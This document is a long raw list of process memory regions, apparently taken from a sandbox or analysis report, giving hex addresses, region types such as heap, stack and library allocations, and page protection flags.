20871220000
heap
page read and write
2D8F64A6000
heap
page read and write
2197E3C0000
heap
page read and write
2D8F662A000
heap
page read and write
196D8991000
heap
page read and write
7FFDFB2C6000
unkown
page execute and read and write
2D8F60C9000
heap
page read and write
13DF6EB0000
heap
page read and write
2D8F6472000
heap
page read and write
7FFD9AF90000
trusted library allocation
page read and write
2D8F63B4000
heap
page read and write
12B0000
heap
page read and write
2197E9E0000
heap
page read and write
1E002FD7000
trusted library allocation
page read and write
2D8F3CA2000
heap
page read and write
215A32DE000
heap
page read and write
2D199C00000
heap
page read and write
282B62A9000
heap
page read and write
2D8F64CA000
heap
page read and write
2D8F3C5A000
heap
page read and write
2D8F6460000
heap
page read and write
121C0000
trusted library allocation
page read and write
364DFD000
stack
page read and write
181AD7C3000
heap
page read and write
235B3110000
heap
page read and write
295324F0000
heap
page read and write
7FFD9AEA1000
trusted library allocation
page read and write
2625EB10000
heap
page read and write
1A601AA4000
heap
page read and write
102EFF000
unkown
page read and write
219000B0000
heap
page read and write
2D8F64E6000
heap
page read and write
21645AD2000
heap
page read and write
7FFD9AD1B000
trusted library allocation
page execute and read and write
19CBDB40000
heap
page read and write
2D8F6447000
heap
page read and write
7FFD9AE10000
trusted library allocation
page execute and read and write
21E8EE40000
heap
page read and write
2D8F3D80000
heap
page read and write
21E8EEA0000
heap
page read and write
16A0000
trusted library allocation
page read and write
9CFF67F000
stack
page read and write
B53338B000
stack
page read and write
19CBC28E000
heap
page read and write
21910201000
trusted library allocation
page read and write
2D8F6638000
heap
page read and write
84175FF000
unkown
page read and write
F22AFDC000
stack
page read and write
20CA0738000
heap
page read and write
181AD7AC000
heap
page read and write
282B6250000
heap
page read and write
85449FF000
stack
page read and write
21645AC6000
heap
page read and write
181AD7A8000
heap
page read and write
EAE287F000
stack
page read and write
19CBBB48000
heap
page read and write
2D8F64DA000
heap
page read and write
2D8F6351000
heap
page read and write
19CBBD10000
heap
page read and write
1F52EEA8000
heap
page read and write
1F72EC80000
heap
page read and write
1E012B21000
trusted library allocation
page read and write
2D8F5E41000
heap
page read and write
19CBDB54000
heap
page read and write
2E4A9A5B000
heap
page read and write
21918A55000
heap
page read and write
16A0000
trusted library allocation
page read and write
7FFD9B080000
trusted library allocation
page read and write
181B0D80000
direct allocation
page read and write
1E01AD04000
heap
page read and write
7FF771DBA000
unkown
page readonly
7FFE0EB41000
unkown
page execute and read and write
16A0000
trusted library allocation
page read and write
196D8991000
heap
page read and write
2D8F64CD000
heap
page read and write
1A6018A4000
heap
page read and write
219006AF000
trusted library allocation
page read and write
256E8B31000
heap
page read and write
7FF623FAE000
unkown
page read and write
20871370000
heap
page read and write
181AD7A0000
heap
page read and write
2197E901000
heap
page read and write
27CC37C0000
heap
page read and write
48C60FE000
stack
page read and write
2D8F3C43000
heap
page read and write
19CBDB4D000
heap
page read and write
181AD9F4000
heap
page read and write
19CBBB63000
heap
page read and write
2D8F5DD0000
heap
page read and write
2D8F3C89000
heap
page read and write
181AD79B000
heap
page read and write
7FFE10244000
unkown
page read and write
2D8F5E51000
heap
page read and write
7FFD9B05C000
trusted library allocation
page read and write
1F52EDF0000
heap
page read and write
5290000
trusted library allocation
page read and write
12140000
trusted library allocation
page read and write
7FFDFB1EE000
unkown
page execute and read and write
4C2D7F8000
stack
page read and write
FA0000
heap
page read and write
2E4A9DD4000
heap
page read and write
2D8F667C000
heap
page read and write
34095EE000
stack
page read and write
21918A59000
heap
page read and write
278960B0000
heap
page read and write
1A601A60000
heap
page read and write
2D8F64C4000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F64A4000
heap
page read and write
19CBBB46000
heap
page read and write
20CA0A64000
heap
page read and write
2D199CC1000
heap
page read and write
2D8F72F8000
direct allocation
page read and write
E43000
trusted library allocation
page read and write
7FFD9AE92000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
2D8F6678000
heap
page read and write
26531980000
heap
page read and write
2D8F6E1D000
heap
page read and write
181B0DED000
direct allocation
page read and write
7FF623FB2000
unkown
page read and write
1D88000
heap
page read and write
2D8F6A0C000
direct allocation
page read and write
181AD769000
heap
page read and write
2D8F649A000
heap
page read and write
2191893C000
heap
page read and write
2D8F6648000
heap
page read and write
21918912000
heap
page read and write
C0F000
stack
page read and write
20DBCB99000
heap
page read and write
7A6D57C000
stack
page read and write
19CBBB27000
heap
page read and write
19DCB06D000
heap
page read and write
19DCB061000
heap
page read and write
19CBC29C000
heap
page read and write
9B000
stack
page read and write
1E000A86000
heap
page read and write
2D8F6466000
heap
page read and write
1D920780000
heap
page read and write
21E8EE96000
heap
page read and write
7FFD9AFB0000
trusted library allocation
page read and write
13DF6C61000
heap
page read and write
20DBCBB8000
heap
page read and write
20DBCBBB000
heap
page read and write
1C378800000
heap
page read and write
2D8F64C1000
heap
page read and write
E448AFF000
stack
page read and write
E67000
trusted library allocation
page execute and read and write
2D8F63F6000
heap
page read and write
7FFDFA225000
unkown
page execute and write copy
2E4A9A7B000
heap
page read and write
2D8F6AB0000
direct allocation
page read and write
2D8F64AE000
heap
page read and write
7FFD9AF80000
trusted library allocation
page read and write
2D8F64C6000
heap
page read and write
215A32DC000
heap
page read and write
2D8F6AB4000
direct allocation
page read and write
27CC3650000
heap
page read and write
219188FA000
heap
page read and write
17A51521000
heap
page read and write
19DCB061000
heap
page read and write
181AD783000
heap
page read and write
19CBC299000
heap
page read and write
2D8F60D9000
heap
page read and write
1D920600000
heap
page read and write
16A0000
trusted library allocation
page read and write
B98FEFF000
unkown
page read and write
20DBCBB8000
heap
page read and write
7FFE1031E000
unkown
page read and write
16A0000
trusted library allocation
page read and write
278CA860000
heap
page read and write
2D8F64F1000
heap
page read and write
21015320000
heap
page read and write
7FFD9AD1D000
trusted library allocation
page execute and read and write
17A51521000
heap
page read and write
77BF1FE000
stack
page read and write
2197E23E000
heap
page read and write
2D8F640A000
heap
page read and write
21918906000
heap
page read and write
181AD78B000
heap
page read and write
121C0000
trusted library allocation
page read and write
2070D390000
heap
page read and write
219001E1000
trusted library allocation
page read and write
2625EB10000
heap
page read and write
256E8A70000
heap
page read and write
221565C0000
heap
page read and write
2D8F6474000
heap
page read and write
215A32AB000
heap
page read and write
7FFDFA174000
unkown
page execute and read and write
181B0C80000
direct allocation
page read and write
282ACE60000
heap
page read and write
2087112B000
heap
page read and write
2D8F3BF0000
heap
page read and write
181AD813000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F63F8000
heap
page read and write
181AD940000
direct allocation
page read and write
2497000
heap
page read and write
FD8F6FE000
stack
page read and write
16A0000
trusted library allocation
page read and write
7FFD9ACF4000
trusted library allocation
page read and write
219188A0000
heap
page execute and read and write
E448A7C000
stack
page read and write
2D8F64C2000
heap
page read and write
402000
unkown
page readonly
14FE000
stack
page read and write
2C4E000
stack
page read and write
2D8F661E000
heap
page read and write
1E000A7D000
heap
page read and write
1E002452000
trusted library allocation
page read and write
2D8F6381000
heap
page read and write
19CBC299000
heap
page read and write
2D8F6407000
heap
page read and write
7DF4D7610000
trusted library allocation
page execute and read and write
2D8F64C1000
heap
page read and write
2D8F6647000
heap
page read and write
16A0000
trusted library allocation
page read and write
1E000AB3000
heap
page read and write
181AD7E9000
heap
page read and write
121C0000
trusted library allocation
page read and write
FD8F4FF000
stack
page read and write
19CBDB46000
heap
page read and write
2D8F3C33000
heap
page read and write
19CBBB8F000
heap
page read and write
7FF633FEC000
unkown
page write copy
2D8F3C60000
heap
page read and write
7FFD9AF60000
trusted library allocation
page read and write
19CBC270000
heap
page read and write
2D8F72E8000
direct allocation
page read and write
181B0DC0000
direct allocation
page read and write
A1E000
heap
page read and write
1316000
heap
page read and write
7FF633FE1000
unkown
page execute read
310F000
stack
page read and write
2D8F5E41000
heap
page read and write
286A51A0000
heap
page read and write
19DCB048000
heap
page read and write
21901965000
trusted library allocation
page read and write
21918678000
heap
page read and write
2E4A9A82000
heap
page read and write
2D8F3C86000
heap
page read and write
2D8F63B4000
heap
page read and write
F7F56F000
stack
page read and write
19CBDB54000
heap
page read and write
7FFD9AD0D000
trusted library allocation
page execute and read and write
215A3280000
heap
page read and write
EF992FF000
unkown
page read and write
1C378740000
heap
page read and write
2D8F3BB0000
heap
page read and write
27CC3734000
heap
page read and write
1A49C1B0000
heap
page read and write
19DCAFA0000
heap
page read and write
7FFD9AD4C000
trusted library allocation
page execute and read and write
2D8F3C94000
heap
page read and write
181AD7D3000
heap
page read and write
2D8F65FA000
heap
page read and write
20DBCE40000
heap
page read and write
2D8F6B4F000
heap
page read and write
2D8F64D8000
heap
page read and write
2D8F64C2000
heap
page read and write
21645ACB000
heap
page read and write
19CBC27F000
heap
page read and write
2D8F637E000
heap
page read and write
1D920924000
heap
page read and write
401000
unkown
page execute read
2D8F65FA000
heap
page read and write
29532500000
heap
page read and write
2D8F63D4000
heap
page read and write
7FFD9AFD0000
trusted library allocation
page read and write
2D8F6677000
heap
page read and write
1DC711E5000
heap
page read and write
17A5150B000
heap
page read and write
1A49C391000
heap
page read and write
21645ACB000
heap
page read and write
2D8F64B6000
heap
page read and write
2D8F63AE000
heap
page read and write
19CBC285000
heap
page read and write
7FFD9AFA0000
trusted library allocation
page read and write
21645ADC000
heap
page read and write
375E2FB000
stack
page read and write
1F72F0A0000
heap
page read and write
215A3240000
heap
page read and write
23D52D04000
heap
page read and write
17A51460000
heap
page read and write
2D8F5E80000
direct allocation
page read and write
7FFD9AD04000
trusted library allocation
page read and write
17A51440000
heap
page read and write
2D8F3C86000
heap
page read and write
7FFDFB2F8000
unkown
page read and write
16A0000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
2D8F68A0000
direct allocation
page read and write
7FFE0EB6B000
unkown
page execute and write copy
28A22150000
heap
page read and write
2E4A9A8D000
heap
page read and write
1E01AD42000
heap
page read and write
2D8F3C5E000
heap
page read and write
1A6018C5000
heap
page read and write
2D8F64C6000
heap
page read and write
3651FF000
stack
page read and write
2D8F63B4000
heap
page read and write
2625EE75000
heap
page read and write
2D8F64B8000
heap
page read and write
2D8F6619000
heap
page read and write
7FFD9AEE0000
trusted library allocation
page execute and read and write
7FFE10251000
unkown
page execute and read and write
2D8F60F7000
heap
page read and write
266C2B60000
heap
page read and write
181AD7B2000
heap
page read and write
2197FD24000
heap
page read and write
181AD79E000
heap
page read and write
19CBBB79000
heap
page read and write
21901561000
trusted library allocation
page read and write
1B091A00000
heap
page read and write
2D8F63E0000
heap
page read and write
2D8F6640000
heap
page read and write
2D8F64F1000
heap
page read and write
2D8F647C000
heap
page read and write
51A0000
trusted library allocation
page read and write
215A32DC000
heap
page read and write
215A3160000
heap
page read and write
1DC70E49000
heap
page read and write
2E4A9A67000
heap
page read and write
7FFE10250000
unkown
page readonly
2F7F4FF000
stack
page read and write
2D8F5E54000
heap
page read and write
5195000
trusted library allocation
page read and write
19CBBB77000
heap
page read and write
21014FE0000
heap
page read and write
2197EBA4000
heap
page read and write
1E002AF0000
heap
page execute and read and write
7FFDFAF93000
unkown
page read and write
A7B000
heap
page read and write
2D8F6081000
heap
page read and write
2E8F000
stack
page read and write
2D8F5DCD000
heap
page read and write
19CBBDB7000
heap
page read and write
121C0000
trusted library allocation
page read and write
2D8F64BE000
heap
page read and write
EE1000
heap
page read and write
2D8F64CA000
heap
page read and write
7FF633FE0000
unkown
page readonly
77BEDDD000
stack
page read and write
2D8F3C5E000
heap
page read and write
181AD880000
heap
page read and write
FD8F57F000
stack
page read and write
21918B40000
heap
page read and write
2D8F3BC0000
heap
page read and write
2D8F6472000
heap
page read and write
2D8F6631000
heap
page read and write
EF98F6C000
stack
page read and write
C60097E000
stack
page read and write
2E4A9A7B000
heap
page read and write
2D8F63B4000
heap
page read and write
2D8F64C4000
heap
page read and write
4C2E5CD000
stack
page read and write
12140000
trusted library allocation
page read and write
7FFE130CC000
unkown
page read and write
7FFD9AF00000
trusted library allocation
page read and write
12140000
trusted library allocation
page read and write
2D8F6246000
heap
page read and write
21447390000
heap
page read and write
181AD7CD000
heap
page read and write
7FFDFB21B000
unkown
page execute and read and write
2D8F3C62000
heap
page read and write
AF3897E000
stack
page read and write
219104D3000
trusted library allocation
page read and write
2D8F63DA000
heap
page read and write
2D8F3CAC000
heap
page read and write
8F449FF000
stack
page read and write
196D8B20000
heap
page read and write
2D8F6677000
heap
page read and write
19CBBB83000
heap
page read and write
2625EE70000
heap
page read and write
2D8F6118000
heap
page read and write
5F65D7E000
stack
page read and write
1E0047B8000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
2D8F64DA000
heap
page read and write
121C0000
trusted library allocation
page read and write
7FFE12E19000
unkown
page execute and read and write
2D8F5DF5000
heap
page read and write
2D8F637F000
heap
page read and write
7FFD9B130000
trusted library allocation
page read and write
F0EA1CD000
stack
page read and write
2D8F64C4000
heap
page read and write
8677DFF000
stack
page read and write
121C0000
trusted library allocation
page read and write
2D8F63D4000
heap
page read and write
51293CF000
stack
page read and write
21902004000
trusted library allocation
page read and write
2D8F6641000
heap
page read and write
1DC70E49000
heap
page read and write
2D8F6638000
heap
page read and write
2D8F64CA000
heap
page read and write
2D8F6364000
heap
page read and write
1E002510000
heap
page execute and read and write
2AF86530000
heap
page read and write
2D8F60EE000
heap
page read and write
2D8F65FA000
heap
page read and write
16A0000
trusted library allocation
page read and write
219189A8000
heap
page read and write
1F9F000
stack
page read and write
2D8F64D8000
heap
page read and write
21645AD3000
heap
page read and write
2D8F64A4000
heap
page read and write
2D8F6382000
heap
page read and write
2D8F658A000
heap
page read and write
45D147E000
stack
page read and write
2D8F6408000
heap
page read and write
208710E0000
heap
page read and write
2D8F663F000
heap
page read and write
7FFD9AD03000
trusted library allocation
page execute and read and write
21EE5810000
heap
page read and write
13DF6EB4000
heap
page read and write
7FFD9AED0000
trusted library allocation
page execute and read and write
278961B0000
heap
page read and write
28A22230000
heap
page read and write
8E63FF000
stack
page read and write
7FFD9AFE0000
trusted library allocation
page read and write
E20000
trusted library allocation
page read and write
181AD79C000
heap
page read and write
19F107F000
stack
page read and write
16A0000
trusted library allocation
page read and write
2D8F3C60000
heap
page read and write
3E00000
direct allocation
page read and write
7FF633FED000
unkown
page write copy
20DBCB9E000
heap
page read and write
1E004413000
trusted library allocation
page read and write
278CAC64000
heap
page read and write
2D8F6638000
heap
page read and write
263BF148000
heap
page read and write
5982BAC000
stack
page read and write
2D8F63B4000
heap
page read and write
1230000
heap
page read and write
2197E700000
heap
page read and write
2D8F3C47000
heap
page read and write
263BF354000
heap
page read and write
13DF6C58000
heap
page read and write
7FFE126D0000
unkown
page readonly
2D8F5E6B000
heap
page read and write
1A49C5C4000
heap
page read and write
2D8F63D4000
heap
page read and write
2D8F6301000
heap
page read and write
427D96C000
stack
page read and write
B53283E000
stack
page read and write
7FFD9B020000
trusted library allocation
page read and write
5982E7F000
stack
page read and write
2D8F65FB000
heap
page read and write
181AD7A7000
heap
page read and write
282B629B000
heap
page read and write
2D8F6B89000
heap
page read and write
21645A00000
heap
page read and write
215A32CE000
heap
page read and write
2D8F72DA000
heap
page read and write
7FF63426E000
unkown
page readonly
2D8F6B47000
heap
page read and write
2D8F5E51000
heap
page read and write
221566A0000
heap
page read and write
1D7A000
heap
page read and write
121C0000
trusted library allocation
page read and write
2D8F649A000
heap
page read and write
19CBC278000
heap
page read and write
7D9FDFF000
stack
page read and write
2D8F5E41000
heap
page read and write
2D8F64DA000
heap
page read and write
BAA487E000
stack
page read and write
2197E8FB000
heap
page read and write
295326F0000
heap
page read and write
280B56B0000
heap
page read and write
7FFE10230000
unkown
page readonly
B3C29AC000
stack
page read and write
45D115F000
stack
page read and write
7FFD9B042000
trusted library allocation
page read and write
2D8F6466000
heap
page read and write
19CBBB83000
heap
page read and write
219101E1000
trusted library allocation
page read and write
2197FD26000
heap
page read and write
16A0000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
2197E901000
heap
page read and write
2D8F658A000
heap
page read and write
282ACFC1000
heap
page read and write
EAE24CD000
stack
page read and write
7FFD9AED4000
trusted library allocation
page read and write
2000000
direct allocation
page read and write
2D8F64C6000
heap
page read and write
19DCB061000
heap
page read and write
20DBCB94000
heap
page read and write
21645AA8000
heap
page read and write
43163AF000
stack
page read and write
2070D560000
heap
page read and write
12140000
trusted library allocation
page read and write
21645ADC000
heap
page read and write
13DF6C61000
heap
page read and write
1E0046F2000
trusted library allocation
page read and write
2D8F5E6B000
heap
page read and write
2D8F6474000
heap
page read and write
121C0000
trusted library allocation
page read and write
20CA0741000
heap
page read and write
AF3857D000
stack
page read and write
2D8F64CA000
heap
page read and write
1D8E000
heap
page read and write
21918A24000
heap
page read and write
2D8F5E41000
heap
page read and write
2D8F6472000
heap
page read and write
2D8F63E1000
heap
page read and write
1A49C470000
heap
page read and write
20CA08F0000
heap
page read and write
34098FE000
stack
page read and write
19CBBD30000
trusted library allocation
page read and write
7FFE13347000
unkown
page readonly
2D8F6631000
heap
page read and write
219187C0000
heap
page read and write
2D8F72D0000
direct allocation
page read and write
282ACF70000
heap
page read and write
7FFDFAF79000
unkown
page execute and read and write
4C2D6FF000
stack
page read and write
2D8F3C3E000
heap
page read and write
2D8F3CAC000
heap
page read and write
217B5045000
heap
page read and write
2625ED00000
heap
page read and write
19CBC299000
heap
page read and write
CDAD47D000
stack
page read and write
7FFE148EE000
unkown
page read and write
2D199CC1000
heap
page read and write
1D72000
heap
page read and write
B5320FF000
stack
page read and write
16A0000
trusted library allocation
page read and write
F8B000
stack
page read and write
2D8F64DA000
heap
page read and write
7FFD9AD5C000
trusted library allocation
page execute and read and write
7FFE10265000
unkown
page execute and read and write
21900266000
trusted library allocation
page read and write
2D8F667B000
heap
page read and write
280B57A0000
heap
page read and write
7FFD9AF00000
trusted library allocation
page read and write
19DCB061000
heap
page read and write
23DAA089000
heap
page read and write
21918916000
heap
page read and write
2D8F64A4000
heap
page read and write
2D8F63F6000
heap
page read and write
20DBCBA0000
heap
page read and write
2D8F63F8000
heap
page read and write
4315FCF000
stack
page read and write
8E5FAC000
stack
page read and write
2D8F63A3000
heap
page read and write
2070D2B0000
heap
page read and write
286A5550000
heap
page read and write
21918714000
heap
page read and write
7FFDFB64D000
unkown
page execute and read and write
23A0FFFD000
heap
page read and write
7FFD9AFD0000
trusted library allocation
page read and write
7FFDFB776000
unkown
page execute and write copy
2D8F5DAD000
heap
page read and write
BAA497E000
stack
page read and write
2D8F63AE000
heap
page read and write
28A22040000
heap
page read and write
16A0000
trusted library allocation
page read and write
7A6D9FF000
stack
page read and write
290CEFF000
stack
page read and write
1FE98624000
heap
page read and write
2D8F643B000
heap
page read and write
7FFD9B020000
trusted library allocation
page read and write
2197E8EA000
heap
page read and write
518C000
trusted library allocation
page read and write
7FFE130C9000
unkown
page execute and read and write
29532518000
heap
page read and write
7FFD9AEF0000
trusted library allocation
page execute and read and write
121C0000
trusted library allocation
page read and write
13DF6BC0000
heap
page read and write
2D8F647A000
heap
page read and write
81E000
stack
page read and write
2D8F3C8B000
heap
page read and write
21447509000
heap
page read and write
21900050000
heap
page readonly
217B4FD0000
heap
page read and write
17A51825000
heap
page read and write
181B0DE9000
direct allocation
page read and write
513B000
trusted library allocation
page read and write
19CBBB22000
heap
page read and write
219188C9000
heap
page read and write
23DAA2A0000
heap
page read and write
E36F87C000
stack
page read and write
2D8F6650000
heap
page read and write
2D8F6666000
heap
page read and write
23DAA080000
heap
page read and write
2D8F6C0B000
heap
page read and write
217B5090000
heap
page read and write
2D8F63F6000
heap
page read and write
7FFDFAFA0000
unkown
page readonly
7FFD9AFF0000
trusted library allocation
page read and write
235B34A0000
heap
page read and write
17A51820000
heap
page read and write
F7F4E8000
stack
page read and write
21910255000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
1FE98620000
heap
page read and write
1B091A08000
heap
page read and write
7FFE130CA000
unkown
page execute and write copy
181AD93B000
direct allocation
page read and write
256F2C30000
heap
page read and write
1FE98220000
heap
page read and write
121C0000
trusted library allocation
page read and write
7FFE0EB40000
unkown
page readonly
2D8F63A0000
heap
page read and write
181B0C20000
direct allocation
page read and write
1F72ED51000
heap
page read and write
7CE000
stack
page read and write
28A22250000
heap
page read and write
181B0D00000
direct allocation
page read and write
2D8F64FA000
heap
page read and write
2D8F5940000
direct allocation
page read and write
167E7FF0000
heap
page read and write
2D8F6659000
heap
page read and write
19DCB061000
heap
page read and write
1C34C650000
heap
page read and write
2D8F64FA000
heap
page read and write
2D8F648B000
heap
page read and write
7FFD9AEBA000
trusted library allocation
page read and write
256E8B31000
heap
page read and write
7FFD9AD02000
trusted library allocation
page read and write
B89CAFF000
stack
page read and write
7FF623F9B000
unkown
page readonly
19CBBB45000
heap
page read and write
2D8F6450000
heap
page read and write
2D8F69C0000
direct allocation
page read and write
2D8F5DE0000
heap
page read and write
2D8F6A50000
direct allocation
page read and write
24EF2848000
heap
page read and write
24310B89000
heap
page read and write
2D8F649A000
heap
page read and write
2D8F3CAD000
heap
page read and write
121C0000
trusted library allocation
page read and write
2D8F663F000
heap
page read and write
84174FB000
stack
page read and write
256E8A80000
heap
page read and write
181B0DA0000
direct allocation
page read and write
21645ACF000
heap
page read and write
181B0D16000
direct allocation
page read and write
2D8F646B000
heap
page read and write
2E4A9C20000
heap
page read and write
26531AF0000
heap
page read and write
181AD81C000
heap
page read and write
1E012B7C000
trusted library allocation
page read and write
1E000C20000
trusted library allocation
page read and write
EF993FF000
stack
page read and write
5280000
heap
page read and write
1E012DF7000
trusted library allocation
page read and write
121C0000
trusted library allocation
page read and write
2D8F64DA000
heap
page read and write
7FFDFB321000
unkown
page execute and read and write
1E000C74000
heap
page read and write
F46000
heap
page read and write
2070D3C0000
heap
page read and write
26531790000
heap
page read and write
121C0000
trusted library allocation
page read and write
219104DC000
trusted library allocation
page read and write
2D8F64A6000
heap
page read and write
2D8F6478000
heap
page read and write
2D8F64F2000
heap
page read and write
1326000
heap
page read and write
20871151000
heap
page read and write
256F2B84000
heap
page read and write
1B091970000
heap
page read and write
7FFDFB029000
unkown
page execute and read and write
CF12D9E000
stack
page read and write
278CAC60000
heap
page read and write
5110000
trusted library allocation
page execute and read and write
2D8F6428000
heap
page read and write
1DC70E51000
heap
page read and write
514E000
trusted library allocation
page read and write
2D8F648B000
heap
page read and write
167E8314000
heap
page read and write
266C2AD0000
heap
page read and write
19CBBD30000
trusted library allocation
page read and write
7FFDFA110000
unkown
page readonly
2D8F5E6B000
heap
page read and write
2D8F64DA000
heap
page read and write
7FFD9AE20000
trusted library allocation
page execute and read and write
2D8F64C6000
heap
page read and write
4315DDF000
stack
page read and write
1D92000
heap
page read and write
7FF623F9B000
unkown
page readonly
2D8F60C9000
heap
page read and write
E40000
trusted library allocation
page read and write
2D8F667B000
heap
page read and write
7FFD9B010000
trusted library allocation
page read and write
7FFD9AED2000
trusted library allocation
page read and write
20DBCBB8000
heap
page read and write
B98FB2C000
stack
page read and write
19CBC28E000
heap
page read and write
121C0000
trusted library allocation
page read and write
1E000AD3000
heap
page read and write
2625EB10000
heap
page read and write
4C2D1A3000
stack
page read and write
7FF623F70000
unkown
page readonly
1F52F095000
heap
page read and write
16A0000
trusted library allocation
page read and write
7FFD9ACF3000
trusted library allocation
page execute and read and write
19CBBB8F000
heap
page read and write
DD0000
heap
page read and write
2A62F3AB000
heap
page read and write
208710C0000
heap
page read and write
7FFE148E9000
unkown
page execute and read and write
16A0000
trusted library allocation
page read and write
2D8F64DA000
heap
page read and write
937A8FC000
stack
page read and write
181AD7BC000
heap
page read and write
2D8F60ED000
heap
page read and write
2D8F64CD000
heap
page read and write
121C0000
trusted library allocation
page read and write
1D920920000
heap
page read and write
7FFD9ACF2000
trusted library allocation
page read and write
2D8F72F4000
direct allocation
page read and write
2D8F6407000
heap
page read and write
1D9206A1000
heap
page read and write
7FF633FEA000
unkown
page readonly
2D8F644C000
heap
page read and write
121C0000
trusted library allocation
page read and write
2D8F3C86000
heap
page read and write
2D8F5DF5000
heap
page read and write
27CC37C0000
heap
page read and write
B53207E000
stack
page read and write
19CBC28E000
heap
page read and write
4C2D8FE000
stack
page read and write
2BC0000
heap
page read and write
1E0025F0000
heap
page read and write
7FFE130C1000
unkown
page execute and read and write
2D8F63A0000
heap
page read and write
2D8F6658000
heap
page read and write
2D8F6638000
heap
page read and write
2D8F69CE000
heap
page read and write
2D8F63A0000
heap
page read and write
2070D3C4000
heap
page read and write
217B4EF0000
heap
page read and write
20CA0A60000
heap
page read and write
19CBC277000
heap
page read and write
7FFE148E0000
unkown
page readonly
2D8F64AE000
heap
page read and write
2D8F6313000
heap
page read and write
1A49C391000
heap
page read and write
5200000
direct allocation
page read and write
19F117F000
stack
page read and write
121C0000
trusted library allocation
page read and write
7FFDFAF8E000
unkown
page execute and read and write
219188C0000
heap
page read and write
1E002F10000
trusted library allocation
page read and write
1A6018F9000
heap
page read and write
2D8F6466000
heap
page read and write
5162000
trusted library allocation
page read and write
2D8F615E000
heap
page read and write
2A62F3A0000
heap
page read and write
2D8F65A2000
heap
page read and write
21918AE0000
trusted library allocation
page read and write
2D8F6ABC000
direct allocation
page read and write
7FF623FB4000
unkown
page readonly
16B0000
heap
page read and write
2D8F64CA000
heap
page read and write
27CC37A0000
heap
page read and write
2D8F64BC000
heap
page read and write
1990000
trusted library allocation
page read and write
2D8F6678000
heap
page read and write
1A6036F0000
heap
page read and write
2D8F640A000
heap
page read and write
2D8F63F6000
heap
page read and write
2D8F63E9000
heap
page read and write
2D199F30000
heap
page read and write
1B8C000
stack
page read and write
3800AFF000
unkown
page read and write
2D8F63DF000
heap
page read and write
7FF77203B000
unkown
page readonly
5982EFF000
stack
page read and write
22156955000
heap
page read and write
2D8F72F0000
direct allocation
page read and write
2D8F6472000
heap
page read and write
282B61F0000
heap
page read and write
2D8F6AD0000
heap
page read and write
1E000AFE000
heap
page read and write
2D8F6614000
heap
page read and write
121C0000
trusted library allocation
page read and write
340956B000
stack
page read and write
2D8F64BE000
heap
page read and write
181B0C60000
direct allocation
page read and write
7FF623F70000
unkown
page readonly
2D8F5D81000
heap
page read and write
2D8F6349000
heap
page read and write
1E000BA0000
heap
page read and write
CD6AC7D000
stack
page read and write
24310B10000
heap
page read and write
7FFD9AEC0000
trusted library allocation
page execute and read and write
263BF350000
heap
page read and write
2CF9000
trusted library allocation
page read and write
2D8F647A000
heap
page read and write
181AD860000
heap
page read and write
282ACF80000
heap
page read and write
21645A20000
heap
page read and write
1DC70E3B000
heap
page read and write
121C0000
trusted library allocation
page read and write
7FF771DBC000
unkown
page write copy
2E4A9A7B000
heap
page read and write
2F7F1CD000
stack
page read and write
1A6018A4000
heap
page read and write
7FFD9AEB0000
trusted library allocation
page execute and read and write
7FFD9B040000
trusted library allocation
page read and write
181AD7B3000
heap
page read and write
2D8F6685000
heap
page read and write
2D8F3C96000
heap
page read and write
FB0000
heap
page read and write
4C2D67E000
stack
page read and write
DE69AFF000
unkown
page read and write
2A62F3AD000
heap
page read and write
48C61FE000
stack
page read and write
B532377000
stack
page read and write
45D14FE000
stack
page read and write
1F72ED51000
heap
page read and write
2D8F6468000
heap
page read and write
2D8F6496000
heap
page read and write
20DBCBB6000
heap
page read and write
F22B2FF000
unkown
page read and write
19CBC283000
heap
page read and write
278CA960000
heap
page read and write
2D8F6472000
heap
page read and write
2D8F64DA000
heap
page read and write
265319C0000
heap
page read and write
256F2B90000
heap
page read and write
121C0000
trusted library allocation
page read and write
121C0000
trusted library allocation
page read and write
2D8F64E7000
heap
page read and write
196D8B30000
heap
page read and write
2191890E000
heap
page read and write
1E002B82000
trusted library allocation
page read and write
181B0CA0000
direct allocation
page read and write
886000
heap
page read and write
2D8F6497000
heap
page read and write
196D897A000
heap
page read and write
7FFD9AEB1000
trusted library allocation
page read and write
215A32A6000
heap
page read and write
7FF623F71000
unkown
page execute read
7DF4D7600000
trusted library allocation
page execute and read and write
2197E19E000
heap
page read and write
280B56F0000
heap
page read and write
1F72ED49000
heap
page read and write
7FFD9B059000
trusted library allocation
page read and write
280B56E0000
heap
page read and write
2A62F3A7000
heap
page read and write
2D8F64C4000
heap
page read and write
2D4F000
stack
page read and write
2D8F63DA000
heap
page read and write
1D86000
heap
page read and write
2D8E000
stack
page read and write
17A51521000
heap
page read and write
21900020000
trusted library allocation
page read and write
2D199C30000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F64C4000
heap
page read and write
A1A000
heap
page read and write
45D10DB000
stack
page read and write
19CBBD60000
heap
page read and write
181B0D40000
direct allocation
page read and write
19DCB061000
heap
page read and write
7FFD9B150000
trusted library allocation
page read and write
23A102D0000
heap
page read and write
263BF040000
heap
page read and write
EAE254E000
stack
page read and write
181AD78A000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F647C000
heap
page read and write
16A0000
trusted library allocation
page read and write
2197E8E0000
heap
page read and write
7FF623FB1000
unkown
page read and write
21918992000
heap
page read and write
5151000
trusted library allocation
page read and write
3400000
direct allocation
page read and write
21E8EE9C000
heap
page read and write
1275000
heap
page read and write
2D8F64CA000
heap
page read and write
7FFD9B070000
trusted library allocation
page read and write
3CD1000
trusted library allocation
page read and write
201E0319000
heap
page read and write
121C0000
trusted library allocation
page read and write
19CBBDB0000
heap
page read and write
16A0000
trusted library allocation
page read and write
24EF2840000
heap
page read and write
7FFD9AF90000
trusted library allocation
page read and write
2D8F6638000
heap
page read and write
19CBDB4E000
heap
page read and write
181AD7C4000
heap
page read and write
28A22061000
heap
page read and write
7FFD9B070000
trusted library allocation
page read and write
20871120000
heap
page read and write
280B57A9000
heap
page read and write
219187A0000
heap
page read and write
51EA000
stack
page read and write
196D8991000
heap
page read and write
3800BFF000
stack
page read and write
19DCC990000
heap
page read and write
2D8F5D80000
heap
page read and write
1E000AB9000
heap
page read and write
CE0000
heap
page read and write
